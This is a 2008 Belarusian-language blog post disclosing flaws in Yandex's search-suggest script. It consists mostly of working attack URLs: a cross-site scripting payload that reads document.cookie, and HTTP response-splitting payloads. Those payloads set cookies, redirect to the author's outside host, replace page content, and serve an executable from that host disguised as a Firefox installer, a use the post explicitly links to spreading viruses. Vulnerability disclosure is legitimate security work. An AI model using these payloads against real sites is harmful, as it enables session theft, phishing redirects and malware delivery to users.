Subscribe feed

У сэрвісе пошукавых падказак Яндэкса выяўленыя множныя ўразлівасці

17 кастрычніка 2008

* Тып уразлівасці: Межсайтовое выкананне сцэнараў (Cross-site Scripting, XSS). Недастатковае фільтраванне змесціва зменнай.

Прыкладанне: /suggest-ya.cgi

GET-зменныя: part

Прыклад: http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html&part=alert(document.cookie)

* Тып уразлівасці: Расшчапленне HTTP-запыту (HTTP Response Splitting)

Прыкладанне: /suggest-ya.cgi

GET-зменныя: ct

Прыклад: ttp://suggest.yandex.ru/suggest-ya.cgi?ct=text/html%0d%0aSet-cookie:Fuzzing=fuzzing.ru%0d%0a%0d%0a&part=fuzzing.ru (усталёўвае cookie ад імя сервера)


Простыя прыклады ўжывання, не кажучы ўжо аб складаных варыянтах.


* Універсальны редиректор - http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html%0d%0aLocation:%20http://fuzzing.ru/%0d%0a%0d%0a&part=fuzzing.ru


* Выкарыстанне ўразлівасцяў іншых прыкладанняў або распостранение вірусаў (падмена content-type)

Можна прапанаваць, да прыкладу, запампаваць з Яндэкса пышную праграму Firefox з пошукам Яндэкса

http://suggest.yandex.ru/suggest-ya.cgi?ct=application/x-msdos-program%0d%0aLocation:%20http://fuzzing.ru/blog/files/FirefoxSetup.exe%0d%0a%0d%0a&part=fuzzing.ru

Або любое іншае прыкладанне або мультымедыя-файл. Да прыкладу.

http://suggest.yandex.ru/suggest-ya.cgi?ct=audio/mp3%0d%0aLocation:%20http://fuzzing.ru/blog/files/somedata.mp3%0d%0a%0d%0a&part=fuzzing.ru


* Падмена змесціва старонкі - http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html;charset=utf-8%0d%0a%0d%0a%D0%91%D0%BB%D0%BE%D0%B3%20fuzzing.ru//&part=fuzzing.ru


рэкамендуем прачытаць таксама

Каментаванне не дазволенае.

Rambler's Top100